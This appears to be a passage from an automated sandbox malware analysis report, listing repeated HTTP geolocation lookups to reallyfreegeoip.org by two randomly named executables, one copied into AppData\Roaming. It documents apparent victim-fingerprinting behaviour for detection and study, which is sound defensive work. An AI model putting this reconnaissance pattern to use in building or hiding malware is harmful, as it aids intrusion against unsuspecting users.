2025-01-10 21:32:40 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859549 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3NdmkkE82Z7z9VHnQae5UphpF9Ev4DYXH9nAcjU66LY0HDqAKRaj4P%2FnT6LOOESKcCsU9QJ8xTg5avg28%2BIJrwj9H47OVw6kcwXq8wmXnj%2F9QG66XxiOL9nNIniQRQx7EEFCZxsQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc7f2dc7943be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1617&rtt_var=609&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1793611&cwnd=226&unsent_bytes=0&cid=08b52ab7519429ff&ts=160&x=0"
2025-01-10 21:32:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	104.21.48.1	443	7284	C:\Users\user\Desktop\VQsnGWaNi5.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:41 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:32:42 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859551 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0mlNIfGQ4Kk6oH%2BLMcumGTnaGk%2FKMaoWjZ7gcJi8WvL8bOJOOPxhFPh00AxJaWbZKYWwuxpQ0opkrdApXFuxxy4ln3tsSuUs31hc2YFa0%2FMFRgR66w76KfVGPhtuyP216OWiyKMa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc7fa5e8043be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1571&rtt_var=611&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1757977&cwnd=226&unsent_bytes=0&cid=d4b9fb47e1df0282&ts=159&x=0"
2025-01-10 21:32:42 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	104.21.48.1	443	7676	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:43 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:32:43 UTC	853	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:43 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859552 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CDl18AT2kqzl7bVzcJ3tVKGJ%2FnrXIqL0eAIENF4ftsz6UoCrNPjkPdkN9f5aYuXtb%2BPonuB6ZMmAZF0olV1hztQWFl0UqXomXfGwYhOcyZt8Rb8iHXYq9PGTLqOLkqcDAspkbcKW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc8022dcf8c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1904&min_rtt=1901&rtt_var=720&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1513737&cwnd=238&unsent_bytes=0&cid=2d04a79267bedefb&ts=187&x=0"
2025-01-10 21:32:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	104.21.48.1	443	7284	C:\Users\user\Desktop\VQsnGWaNi5.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:43 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:32:43 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:43 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859553 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9YOCek94oXO8fv1x3aX3OODqmrm%2F5TXvMrYtfVLGXTIC5uguO8YjNWfJUX6Lhn2e0Z6z%2Bmo7I5hoj%2BPc9eAQDCMTY4RClvI8aS8qrownrsKEsepqJ81KF%2Bdp1ng5ikEEXUqW8GH8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc80688d142e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1575&rtt_var=611&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1762220&cwnd=240&unsent_bytes=0&cid=f13719155b3b0748&ts=155&x=0"
2025-01-10 21:32:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	104.21.48.1	443	7676	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:44 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 21:32:44 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:44 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859553 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sjvIXI46Ux7CLRBPcOhHhTaTmf4xtWE8ttu0xEk4VdP4at%2BfTHeni%2Bxl4WTZ6B961SMeswj0%2FSMM1Ser6JOoSg3GH%2Bmtd6El1jJV2aeU6ReYM7hG2oOXUQ1XUhEqzQEulfsvvj1f"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc8094cb48cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1980&rtt_var=747&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1474747&cwnd=243&unsent_bytes=0&cid=52536114da8cf67a&ts=155&x=0"
2025-01-10 21:32:44 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49749	104.21.48.1	443	7284	C:\Users\user\Desktop\VQsnGWaNi5.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:44 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 21:32:45 UTC	853	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:45 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859554 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vNcBLAT%2BUVeGbtuKLGFqQfobRNUnfuVYUuHJ14OSYX7M1xoe6FOc6gVndYLPk2kX1L9rJifLLv8OE2qQS6f7zQI41cNYaZYtg1Ak%2B9RFmYlvAcrfwreDGlb5JnBuk9byTEfRX4Ng"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc80dbc9943be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1595&rtt_var=609&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1781574&cwnd=226&unsent_bytes=0&cid=7450f6caa7b2c519&ts=147&x=0"
2025-01-10 21:32:45 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49750	104.21.48.1	443	7676	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:45 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:32:45 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:45 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859554 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ESLat%2FnGOF%2F8bLTje23HFX6dq2VErjNY4QZ6u01%2FyQWISB%2F9SmTPQBSsCNYbSXZsRod9gDpai0pN7q7JYNX6dFlpNthSbLU7yXf7Ygh9xLBb7FnskAkni6sVyhpPh7wUQkA3Hnk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc80ffee88c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1815&rtt_var=684&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1597374&cwnd=238&unsent_bytes=0&cid=ef91038336ff7fbb&ts=149&x=0"
2025-01-10 21:32:45 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49754	104.21.48.1	443	7676	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:46 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:32:46 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:46 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859555 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=89T58K0OqE4lzAgALYr2gzyctCEYtcQV1z9sG0%2BhbzzyT1iXmojbA3geRmBs6cQw6S6otiszsvN5w8ouWsEXPFBQWZeQj3PIBTAtBmt2P%2FrfvPptaytR%2FpRL6799QQnocdpYIvTX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc8171ef942e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1700&rtt_var=655&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1717647&cwnd=240&unsent_bytes=0&cid=20f70584af0cbfc1&ts=163&x=0"
2025-01-10 21:32:46 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49755	104.21.48.1	443	7284	C:\Users\user\Desktop\VQsnGWaNi5.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:46 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:32:46 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:46 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859555 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JwFse9BR2XleExTvdoyKAx5op%2FKHA2g7MY2Q2rexe%2FV%2BKzl3bYllpn0vk0UtgobdzxJ81AqUzK%2Bt%2Fvc5qf9EYggBBHhcFYzrnNV2kaKkHgOYJ7czURqC3%2FHXxJM43CfZ3AN8tcD8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc8179f968c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1798&rtt_var=697&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1543340&cwnd=238&unsent_bytes=0&cid=7ce7ca9ff4787142&ts=137&x=0"
2025-01-10 21:32:46 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49760	104.21.48.1	443	7676	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:47 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 21:32:47 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:47 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859556 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=31SRbTTi1vjDkkS%2Fo2aOSbMf9XoYtQIyzW7EeYgWUOcTwcspw3Uf9nVUMi7mJNhCAnlV0jDCilS6vRicjsEsEsSLk1Nr%2BL5mazxlCO%2Bjuc15oZy1%2FzRTDK2GhbRIs6U8s0AUIjZy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc81dffcf8c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1813&rtt_var=683&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1610590&cwnd=238&unsent_bytes=0&cid=b0006f114c0b2468&ts=146&x=0"
2025-01-10 21:32:47 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

